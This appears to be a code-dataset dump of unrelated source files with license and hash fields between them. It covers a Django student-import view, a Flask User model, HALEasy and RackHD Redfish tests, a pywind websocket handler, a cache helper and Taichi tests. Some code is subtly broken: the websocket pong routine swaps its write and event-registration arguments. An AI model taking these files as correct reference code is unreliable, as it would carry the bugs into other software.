total_filas = hoja.max_row # capturar valor maximo de filas a leer
total_columnas = hoja.max_column # capturar valor maximo de columnas
user_no_register = []
#loop de lectura y escritura
for i in range(2, total_filas+1):
form = EstudianteForm() #formulario de perfil usuario
# probar existencia de estudiante
rut = hoja.cell(row=i,column=1).value
estudiante_no_register = []
try:
estudiante = Estudiante.objects.get(rut=rut)
print 'estudiante ya existe'
estudiante_no_register += [estudiante]
except:
rut = hoja.cell(row=i,column=1).value
nombres = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
nombre2 = ''
nombre3 = ''
nombres = nombres.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
form = form.save(commit=False)
form.rut = rut
form.nombre1 = nombres
form.nombre2 = nombre2
form.nombre3 = nombre3
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.save()
print estudiante_no_register
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {
'form': form,
}
return render(request, 'apps/usuarios/estudiante_upload.html', context)
def get_planilla_estudiante(request):
#generar excel
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Estudiantes'
# ws.font = ws.font.copy(bold=True, italic=True)
# Cabeceras
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
nombre_archivo = 'Planilla_estudiantes.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
# AJAX
class GetEstudiantes(TemplateView):
def get(self, request, *args, **kwargs):
estudiante = Estudiante.objects.all()
print estudiante
data = serializers.serialize('json', estudiante)
return HttpResponse(data, content_type="application/json") | apache-2.0 | 1,000,900,255,023,441,300 | 29.313684 | 156 | 0.682317 | false |
svenstaro/python-web-boilerplate | boilerplateapp/models/user.py | 1 | 2930 | """Module containing the `User` model."""
import uuid
import secrets
import string
from datetime import datetime
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy_utils.models import Timestamp
from flask import current_app
from boilerplateapp.extensions import db, passlib
class User(db.Model, Timestamp):
"""User model."""
id = db.Column(UUID(as_uuid=True), primary_key=True, nullable=False, default=uuid.uuid4)
email = db.Column(db.String(120), unique=True, nullable=False, index=True)
password_hash = db.Column(db.String(120), nullable=False)
current_auth_token = db.Column(db.String(32), index=True)
last_action = db.Column(db.DateTime)
def __init__(self, email, password):
"""Construct a `User`.
Accepts an `email` and a `password`. The password is securely hashed
before being written to the database.
"""
self.email = email
self.set_password(password)
def __repr__(self):
"""Format a `User` object."""
return '<User {email}>'.format(email=self.email)
def set_password(self, new_password):
"""Hash a given `new_password` and write it into the `User.password_hash` attribute.
It does not add this change to the session not commit the transaction!
"""
self.password_hash = passlib.pwd_context.hash(new_password)
def verify_password(self, candidate_password):
"""Verify a given `candidate_password` against the password hash stored in the `User`.
Returns `True` if the password matches and `False` if it doesn't.
"""
return passlib.pwd_context.verify(candidate_password, self.password_hash)
def generate_auth_token(self):
"""Generate an auth token and save it to the `current_auth_token` column."""
alphabet = string.ascii_letters + string.digits
new_auth_token = ''.join(secrets.choice(alphabet) for i in range(32))
self.current_auth_token = new_auth_token
self.last_action = datetime.utcnow()
db.session.add(self)
db.session.commit()
return new_auth_token
@property
def has_valid_auth_token(self):
"""Return whether or not the user has a valid auth token."""
latest_valid_date = datetime.utcnow() - current_app.config['AUTH_TOKEN_TIMEOUT']
return (self.last_action and
self.last_action > latest_valid_date and
self.current_auth_token)
@staticmethod
def get_user_from_login_token(token):
"""Get a `User` from a login token.
A login token has this format:
<user uuid>:<auth token>
"""
user_id, auth_token = token.split(':')
user = db.session.query(User).get(user_id)
if user and user.current_auth_token:
if secrets.compare_digest(user.current_auth_token, auth_token):
return user
return None
| mit | 2,480,630,203,031,518,700 | 35.17284 | 94 | 0.646075 | false |
mattclarkdotnet/haleasy | test/test_haltalk.py | 1 | 4074 | from unittest import TestCase
from haleasy import HALEasy
import responses
class TestHaleasyHaltalk(TestCase):
haltalk_root = '''{
"_links": {
"self": {
"href":"/"
},
"curies": [
{
"name": "ht",
"href": "http://haltalk.herokuapp.com/rels/{rel}",
"templated": true
}
],
"ht:users": {
"href":"/users"
},
"ht:signup": {
"href":"/signup"
},
"ht:me": {
"href": "/users/{name}",
"templated":true
},
"ht:latest-posts": {
"href":"/posts/latest"
}
},
"welcome": "Welcome to a haltalk server.",
"hint_1": "You need an account to post stuff..",
"hint_2": "Create one by POSTing via the ht:signup link..",
"hint_3": "Click the orange buttons on the right to make POST requests..",
"hint_4": "Click the green button to follow a link with a GET request..",
"hint_5": "Click the book icon to read docs for the link relation."
}'''
haltalk_get_user_aaa = '''{
"_links": {
"self": {
"href": "/users/aaa"
},
"curies": [
{
"name": "ht",
"href": "http://haltalk.herokuapp.com/rels/{rel}",
"templated": true
},
{
"name": "bla",
"href": "http://haltalk.herokuapp.com/rels/{rel}",
"templated": true
}
],
"ht:posts": {
"href": "/users/aaa/posts"
}
},
"username": "aaa",
"bio": null,
"real_name": null
}'''
def setUp(self):
responses.reset()
responses.add(responses.GET, 'http://haltalk.herokuapp.com.test_domain/',
body=self.haltalk_root, status=200,
content_type='application/json')
responses.add(responses.POST, 'http://haltalk.herokuapp.com.test_domain/signup',
body='', status=201,
adding_headers={'Location': 'http://haltalk.herokuapp.com.test_domain/users/aaa'},
content_type='application/json')
responses.add(responses.GET, 'http://haltalk.herokuapp.com.test_domain/users/aaa',
body=self.haltalk_get_user_aaa, status=200,
content_type='application/json')
@responses.activate
def test_haltalk_root(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
self.assertEqual(h.link(rel=u'self')['href'], u'/')
self.assertEqual(h.link(rel=u'http://haltalk.herokuapp.com/rels/users')['href'], u'/users')
self.assertEqual(h.link(rel=u'http://haltalk.herokuapp.com/rels/me')['href'], u'/users/{name}')
self.assertEqual(h.link(rel=u'http://haltalk.herokuapp.com/rels/me')['templated'], True)
@responses.activate
def test_haltalk_root_with_curies(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
self.assertEqual(h.link(rel=u'self')['href'], u'/')
self.assertEqual(h.link(rel=u'ht:users')['href'], u'/users')
self.assertEqual(h.link(rel=u'ht:me')['href'], u'/users/{name}')
self.assertEqual(h.link(rel=u'ht:me')['templated'], True)
@responses.activate
def test_haltalk_create_user(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
user = h.link(rel='ht:signup').follow(method='POST', data={'username': 'aaa', 'password': 'bbb'})
self.assertEqual(user['username'], 'aaa')
@responses.activate
def test_haltalk_get_me_aaa(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
user = h.link(rel='ht:me').follow(name='aaa')
self.assertEqual(user['username'], 'aaa') | mit | 1,266,185,808,340,458,200 | 37.084112 | 105 | 0.500982 | false |
fdslight/fdslight | pywind/web/handlers/websocket.py | 1 | 8933 | #!/usr/bin/env python3
import pywind as tcp_handler
import pywind.web.lib.websocket as websocket
import pywind.web.lib.httputils as httputils
import socket, time
class ws_listener(tcp_handler.tcp_handler):
def init_func(self, creator, listen, is_ipv6=False):
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
s = socket.socket(fa, socket.SOCK_STREAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.set_socket(s)
self.bind(listen)
return self.fileno
def after(self):
self.listen(10)
self.register(self.fileno)
self.add_evt_read(self.fileno)
def tcp_accept(self):
while 1:
try:
cs, caddr = self.accept()
except BlockingIOError:
break
self.ws_accept(cs,caddr)
''''''
def ws_accept(self,cs,caddr):
"""重写这个方法
:param cs:客户端套接字对象
:param caddr:客户端地址
:return:
"""
pass
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def ws_release(self):
"""重写这个方法
:return:
"""
class ws_handler(tcp_handler.tcp_handler):
__conn_timeout = 60
__caddr = None
__encoder = None
__decoder = None
__is_handshake = None
__LOOP_TIMEOUT = 20
__update_time = 0
# 自定义的握手响应头
__ext_handshake_resp_headers = None
__is_close = False
__is_sent_ping = False
def init_func(self, creator, cs, caddr):
self.__caddr = caddr
self.__decoder = websocket.decoder(server_side=True)
self.__encoder = websocket.encoder(server_side=True)
self.__is_handshake = False
self.__ext_handshake_resp_headers = []
self.__is_close = False
self.set_socket(cs)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
self.ws_init()
return self.fileno
def ws_init(self):
"""重写这个方法
:return:
"""
pass
@property
def caddr(self):
return self.__caddr
def response_error(self):
resp_sts = httputils.build_http1x_resp_header("400 Bad Request", [("Sec-WebSocket-Version", 13), ],
version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
self.delete_this_no_sent_data()
def __do_handshake(self, byte_data):
try:
sts = byte_data.decode("iso-8859-1")
except UnicodeDecodeError:
self.response_error()
return False
try:
rs = httputils.parse_htt1x_request_header(sts)
except:
self.response_error()
return False
req, headers = rs
dic = {}
for k, v in headers:
k = k.lower()
dic[k] = v
if "sec-websocket-key" not in dic: return False
ws_version = dic.get("sec-websocket-version", 0)
is_err = False
try:
ws_version = int(ws_version)
if ws_version != 13: is_err = True
except ValueError:
is_err = True
if is_err:
self.response_error()
return False
if not self.on_handshake(req, headers):
self.response_error()
return False
sec_ws_key = dic["sec-websocket-key"]
resp_sec_key = websocket.gen_handshake_key(sec_ws_key)
resp_headers = [("Upgrade", "websocket"), ("Connection", "Upgrade"), ("Sec-WebSocket-Accept", resp_sec_key)]
resp_headers += self.__ext_handshake_resp_headers
resp_sts = httputils.build_http1x_resp_header("101 Switching Protocols", resp_headers, version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
return True
def __handle_ping(self, message):
self.__send_pong(message)
def __handle_pong(self):
self.__is_sent_ping = False
self.__update_time = time.time()
def __handle_close(self):
if not self.__is_close:
self.ws_close()
return
self.delete_handler(self.fileno)
def __send_ping(self):
wrap_msg = self.__encoder.build_ping()
self.__is_sent_ping = True
self.__update_time = time.time()
self.writer.write(wrap_msg)
self.add_evt_write(self.fileno)
def __send_pong(self, message):
wrap_msg = self.__encoder.build_pong(message)
self.__update_time = time.time()
self.writer.write(self.fileno)
self.add_evt_write(wrap_msg)
def on_handshake(self, request, headers):
"""重写这个方法
:param request:
:param headers:
:return Boolean: False表示握手不允许,True表示握手允许
"""
return True
def set_handshake_resp_header(self, name, value):
"""设置额外的响应头
:param name:
:param value:
:return:
"""
self.__ext_handshake_resp_headers.append((name, value,))
def set_ws_timeout(self, timeout):
self.__conn_timeout = int(timeout)
if self.__conn_timeout < 1: raise ValueError("wrong timeout value")
def tcp_readable(self):
rdata = self.reader.read()
if not self.__is_handshake:
if not self.__do_handshake(rdata): return
self.__is_handshake = True
return
self.__decoder.input(rdata)
while self.__decoder.continue_parse():
self.__decoder.parse()
if not self.__decoder.can_read_data(): continue
data = self.__decoder.get_data()
self.__handle_readable(data, self.__decoder.fin, self.__decoder.rsv, self.__decoder.opcode,
self.__decoder.frame_ok())
if self.__decoder.frame_ok(): self.__decoder.reset()
self.__update_time = time.time()
return
def __handle_readable(self, message, fin, rsv, opcode, frame_finish):
"""
:param message:
:param fin:
:param rsv:
:param opcode:
:param frame_finish:
:return:
"""
if opcode == websocket.OP_CLOSE:
self.__handle_close()
return
if opcode == websocket.OP_PING:
self.__handle_ping(message)
return
if opcode == websocket.OP_PONG:
self.__handle_pong()
return
if not message: return
if message: self.ws_readable(message, fin, rsv, opcode, frame_finish)
def tcp_writable(self):
self.remove_evt_write(self.fileno)
def tcp_error(self):
self.delete_handler(self.fileno)
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def tcp_timeout(self):
if not self.__is_handshake:
self.delete_handler(self.fileno)
return
t = time.time()
if t - self.__update_time >= self.__conn_timeout:
if self.__is_close or self.__is_sent_ping:
self.delete_handler(self.fileno)
return
self.__send_ping()
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
def sendmsg(self, msg, fin, rsv, opcode):
"""发送websocket消息
:param msg:
:return:
"""
if opcode in (0x8, 0x9, 0xa,): raise ValueError("ping,pong,close frame cannot be sent by this function")
if self.__is_close: raise ValueError("the connection is closed,you should not send data")
self.__update_time = time.time()
wrap_msg = self.__encoder.build_frame(msg, fin, rsv, opcode)
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
def ws_readable(self, message, fin, rsv, opcode, frame_finish):
"""重写这个方法
:param message:
:param fin:
:param rsv:
:param opcode:
:param is_finish:
:return:
"""
pass
def ws_close(self, code=None):
"""关闭ws连接
:return:
"""
if not code:
code = ""
else:
code = str(code)
wrap_msg = self.__encoder.build_close(code.encode("iso-8859-1"))
self.__is_close = True
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
self.__update_time = time.time()
self.delete_this_no_sent_data()
def ws_release(self):
"""重写这个方法
:return:
"""
pass | bsd-2-clause | -8,273,594,278,908,964,000 | 25.149254 | 116 | 0.545953 | false |
johren/RackHD | test/tests/redfish10/test_redfish10_api_systems.py | 1 | 17067 | '''
Copyright 2016, EMC, Inc.
Author(s):
George Paulos
'''
import fit_path # NOQA: unused import
import os
import sys
import subprocess
import fit_common
import flogging
log = flogging.get_loggers()
# Local methods
NODECATALOG = fit_common.node_select()
def _delete_active_tasks(node):
for dummy in range(1,10):
if fit_common.rackhdapi('/api/current/nodes/' + node + '/workflows/active', action='delete')['status'] in [204, 404]:
return True
else:
fit_common.time.sleep(10)
return False
# Select test group here using @attr
from nose.plugins.attrib import attr
@attr(all=True, regression=True, smoke=True)
class redfish10_api_systems(fit_common.unittest.TestCase):
def test_redfish_v1_systems(self):
api_data = fit_common.rackhdapi('/redfish/v1/Systems')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
# check all fields
for item in api_data['json']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertNotEqual(item, "", 'Empty JSON Field')
# check required fields
for item in ['Name', '@odata.id', '@odata.type']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertIn(item, api_data['json'], item + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format( api_data['json'][item]))
self.assertGreater(len(api_data['json'][item]), 0, item + ' field empty')
# test all nodeid links
for item in api_data['json']['Members']:
link_data = fit_common.rackhdapi(item['@odata.id'])
# all these are legit return codes under different conditions
self.assertEqual(link_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(link_data['status']))
def test_redfish_v1_systems_id(self):
api_data = fit_common.rackhdapi('/redfish/v1/Systems')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for nodeid in api_data['json']['Members']:
api_data = fit_common.rackhdapi(nodeid['@odata.id'])
if api_data['status'] == 200: # if valid cache record, run chassis ID query
# check required fields
# check Name field first because that will be used for other checks
self.assertIn('Name', api_data['json'], 'Name field not present')
self.assertGreater(len(api_data['json']['Name']), 0, 'Name field empty')
system_name = api_data['json']['Name']
if fit_common.VERBOSITY >= 2:
print ("System Name: {0}".format(system_name))
for item in ['SKU', 'BiosVersion', 'PowerState', 'Processors', '@odata.id', 'Status', 'UUID',
'Manufacturer', 'IndicatorLED']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
print ("\t {0}".format(api_data['json'][item]))
self.assertIn(item, api_data['json'], item + ' field not present')
# comment the following out until ODR-526 resolved, Unknown sytems return
# a Name value of 'Computer System' instead of 'Unknown'
#if system_name != 'Unknown':
# self.assertGreater(len(api_data['json'][item]), 0, item + ' field empty')
def test_redfish_v1_systems_id_actions_computersystemreset_get(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Actions/ComputerSystem.Reset')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
reset_commands = [
"On",
"ForceOff",
"GracefulShutdown",
"GracefulRestart",
"ForceRestart",
"Nmi",
"ForceOn",
"PushPowerButton"
]
# iterate through all posted reset types for each node
for reset_type in api_data['json']['[email protected]']:
if fit_common.VERBOSITY >= 2:
print "Checking: {0}".format(reset_type)
self.assertIn(reset_type, reset_commands, "Incorrect reset_type")
def test_redfish_v1_systems_id_actions_computersystemreset_post(self):
# iterate through node IDs
for nodeid in NODECATALOG:
# delete previously active tasks
_delete_active_tasks(nodeid)
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Actions/ComputerSystem.Reset')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
on_payload = {"reset_type": "On"}
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid +
'/Actions/ComputerSystem.Reset', action='post',
payload=on_payload)
self.assertEqual(api_data['status'], 202, 'Incorrect HTTP return code, expected 202, got:' + str(api_data['status']))
# check for running task
task_data = fit_common.rackhdapi(api_data['json']['@odata.id'])
self.assertEqual(task_data['status'], 200, "No task ID for reset ")
self.assertIn(task_data['json']['TaskState'], ["Running", "Pending", "Completed", "Exception"], "Bad task state for node:" + nodeid)
def test_redfish_v1_systems_id_actions_rackhdbootimage_get(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Actions/RackHD.BootImage')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_logservices(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid)
if api_data['status'] == 200:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/LogServices')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_processors_id(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Processors')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for links in api_data['json']['Members']:
api_data = fit_common.rackhdapi(links['@odata.id'])
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for item in api_data['json']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
print ("\t {0}".format(api_data['json'][item]))
self.assertNotEqual(item, "", 'Empty JSON Field')
def test_redfish_v1_systems_id_ethernetinterfaces(self):
# Will produce a list of available Ethernet interfaces
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/EthernetInterfaces')
self.assertIn(api_data['status'], [200], 'Expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_bios(self):
# Only works for Dell servers with microservices
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Bios')
if fit_common.is_dell_node(nodeid):
self.assertIn(api_data['status'], [200], 'Expected 200, got:' + str(api_data['status']))
else:
self.assertIn(api_data['status'], [404], 'Expected 404, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_bios_settings(self):
# Only works for Dell servers with microservices
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Bios/Settings')
if fit_common.is_dell_node(nodeid):
self.assertIn(api_data['status'], [200], 'Expected 200, got:' + str(api_data['status']))
else:
self.assertIn(api_data['status'], [404], 'Expected 404, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_simplestorage(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SimpleStorage')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_simplestorage_id(self):
href_list = []
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SimpleStorage')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for nodeid in api_data['json']['Members']:
href_list.append(nodeid['@odata.id']) # collect links
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
# iterate through links
for url in href_list:
api_data = fit_common.rackhdapi(url)
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_logservices_sel(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL")
if fit_common.VERBOSITY >= 2:
print ("nodeid: {0}".format(nodeid))
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for item in ['MaxNumberOfRecords', 'OverWritePolicy', 'DateTimeLocalOffset', 'Actions']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
print ("\t {0}".format(api_data['json'][item]))
self.assertIn(item, api_data['json'], item + ' field not present')
self.assertGreater(len(str(api_data['json'][item])), 0, item + ' field empty')
def test_redfish_v1_systems_id_logservices_sel_entries(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL/Entries")
if fit_common.VERBOSITY >= 2:
print ("nodeid: {0}".format(nodeid))
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
# check required fields in the nodeid entry
for nodeid in api_data['json']['Members']:
self.assertIn('@odata.id', nodeid, '@odata.id field not present')
self.assertGreater(len(nodeid['@odata.id']), 0, '@odata.id field empty')
if fit_common.VERBOSITY >= 2:
print ("\nEntry {0}".format(nodeid['@odata.id']))
for item in [ 'Id', 'Created', 'EntryCode', 'EntryType', 'SensorType', 'Name', 'Message' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertIn(item, nodeid, item + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format(nodeid[item]))
if len(nodeid[item]) == 0 and item == 'Message':
log.info_5("Message field empty for SEL SensorType:" + nodeid['SensorType'] +
" SensorNumber:" + str(nodeid['SensorNumber']))
else:
self.assertGreater(len(nodeid[item]), 0, item + ' field empty')
for link in [ 'OriginOfCondition' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(link))
self.assertIn('OriginOfCondition', nodeid['Links'], 'OriginOfCondition' + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0} ".format(nodeid['Links']['OriginOfCondition']))
def test_redfish_v1_systems_id_logservices_sel_entries_id(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL/Entries")
if fit_common.VERBOSITY >= 2:
print ("nodeid: {0}".format(nodeid))
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for member in api_data['json']['Members']:
self.assertIn('@odata.id', member, '@odata.id field not present')
self.assertGreater(len(member['@odata.id']), 0, '@odata.id field empty')
if fit_common.VERBOSITY >= 2:
print ("\nEntry {0}".format(member['@odata.id']))
#get the selid off the list
selid = str(member['Id'])
if fit_common.VERBOSITY >= 3:
print ("SEL Entry: {0}".format(selid))
#retrieve the data for the specific SEL entry and iterate through individual fields
seldata = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL/Entries/" + selid)
self.assertEqual(seldata['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(seldata['status']))
for item in [ 'Id', 'Created', 'EntryCode', 'EntryType', 'SensorType', 'Name', 'Message' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertIn(item, seldata['json'], item + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format(seldata['json'][item]))
if len(seldata['json'][item]) == 0 and item == 'Message':
log.info_5("Message field empty for SEL SensorType:" + seldata['json']['SensorType'] +
" SensorNumber:" + str(seldata['json']['SensorNumber']))
else:
self.assertGreater(len(seldata['json'][item]), 0, item + ' field empty')
for link in [ 'OriginOfCondition' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(link))
self.assertIn('OriginOfCondition', seldata['json']['Links'], 'OriginOfCondition' + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format(seldata['json']['Links']['OriginOfCondition']))
def test_redfish_v1_systems_id_secureboot(self):
# Currently relies on Dell/Racadm, so just test for exceptions
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SecureBoot')
self.assertEqual(api_data['status'], 500, 'Incorrect HTTP return code, expected 500, got:' + str(api_data['status']))
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SecureBoot', action='post',
payload={"zzzSecureBootEnable": True})
self.assertEqual(api_data['status'], 400, 'Incorrect HTTP return code, expected 400, got:' + str(api_data['status']))
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SecureBoot', action='post',
payload={"SecureBootEnable": True})
self.assertEqual(api_data['status'], 500, 'Incorrect HTTP return code, expected 500, got:' + str(api_data['status']))
if __name__ == '__main__':
fit_common.unittest.main()
| apache-2.0 | -1,922,357,574,213,929,200 | 57.05102 | 144 | 0.564716 | false |
broomyocymru/ditto | ditto/core/cache.py | 1 | 1389 | import glob
import os
import shutil
import uuid
from os.path import expanduser
import requests
from ditto.core import logger
def setup():
global session_uuid
session_uuid = str(uuid.uuid1())
def cleanup():
shutil.rmtree(get_cache_dir(), True)
def get_session_uuid():
return session_uuid
def get_file(file_path):
if file_path.startswith('http'):
fname = file_path.split('/')[-1]
if not os.path.exists(get_cache_dir()):
os.makedirs(get_cache_dir())
local_path = os.path.abspath(get_cache_dir() + '/' + fname)
r = requests.get(file_path, stream=True)
if r.status_code == 200:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
del r
else:
logger.error("Download failed (" + file_path + ")")
file_path = local_path
else:
file_paths = glob.glob(file_path)
if len(file_paths) > 1:
logger.warn("More than 1 file found, taking first")
if len(file_paths) == 0:
logger.error("File not found (" + file_path + ")")
file_path = os.path.abspath(file_paths[0])
return file_path
def get_cache_dir():
cache_dir = os.path.abspath(os.path.join(expanduser("~"), ".ditto_cache"))
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
return cache_dir | mit | -2,744,009,419,647,377,400 | 21.419355 | 78 | 0.587473 | false |
yuanming-hu/taichi | tests/python/test_bitmasked.py | 1 | 4777 | import taichi as ti
def archs_support_bitmasked(func):
return ti.archs_excluding(ti.opengl, ti.cc)(func)
@archs_support_bitmasked
def test_basic():
x = ti.field(ti.i32)
c = ti.field(ti.i32)
s = ti.field(ti.i32)
bm = ti.root.bitmasked(ti.ij, (3, 6)).bitmasked(ti.i, 5)
bm.place(x)
ti.root.place(c, s)
@ti.kernel
def run():
x[5, 1] = 2
x[9, 4] = 20
x[0, 3] = 20
@ti.kernel
def sum():
for i, j in x:
c[None] += ti.is_active(bm, [i, j])
s[None] += x[i, j]
run()
sum()
assert c[None] == 3
assert s[None] == 42
@archs_support_bitmasked
def test_bitmasked_then_dense():
x = ti.field(ti.f32)
s = ti.field(ti.i32)
n = 128
ti.root.bitmasked(ti.i, n).dense(ti.i, n).place(x)
ti.root.place(s)
@ti.kernel
def func():
for i in x:
s[None] += 1
x[0] = 1
x[127] = 1
x[256] = 1
x[257] = 1
func()
assert s[None] == 256
@archs_support_bitmasked
def test_bitmasked_bitmasked():
x = ti.field(ti.f32)
s = ti.field(ti.i32)
n = 128
ti.root.bitmasked(ti.i, n).bitmasked(ti.i, n).place(x)
ti.root.place(s)
@ti.kernel
def func():
for i in x:
s[None] += 1
x[0] = 1
x[127] = 1
x[256] = 1
x[257] = 1
func()
assert s[None] == 4
@archs_support_bitmasked
def test_huge_bitmasked():
# Mainly for testing Metal listgen's grid-stride loop implementation.
x = ti.field(ti.f32)
s = ti.field(ti.i32)
n = 1024
ti.root.bitmasked(ti.i, n).bitmasked(ti.i, 2 * n).place(x)
ti.root.place(s)
@ti.kernel
def func():
for i in range(n * n * 2):
if i % 32 == 0:
x[i] = 1.0
@ti.kernel
def count():
for i in x:
s[None] += 1
func()
count()
assert s[None] == (n * n * 2) // 32
@archs_support_bitmasked
def test_bitmasked_listgen_bounded():
# Mainly for testing Metal's listgen is bounded by the actual number of
# elements possible for that SNode. Note that 1) SNode's size is padded
# to POT, and 2) Metal ListManager's data size is not padded, we need to
# make sure listgen doesn't go beyond ListManager's capacity.
x = ti.field(ti.i32)
c = ti.field(ti.i32)
# A prime that is bit higher than 65536, which is Metal's maximum number of
# threads for listgen.
n = 80173
ti.root.dense(ti.i, n).bitmasked(ti.i, 1).place(x)
ti.root.place(c)
@ti.kernel
def func():
for i in range(n):
x[i] = 1
@ti.kernel
def count():
for i in x:
c[None] += 1
func()
count()
assert c[None] == n
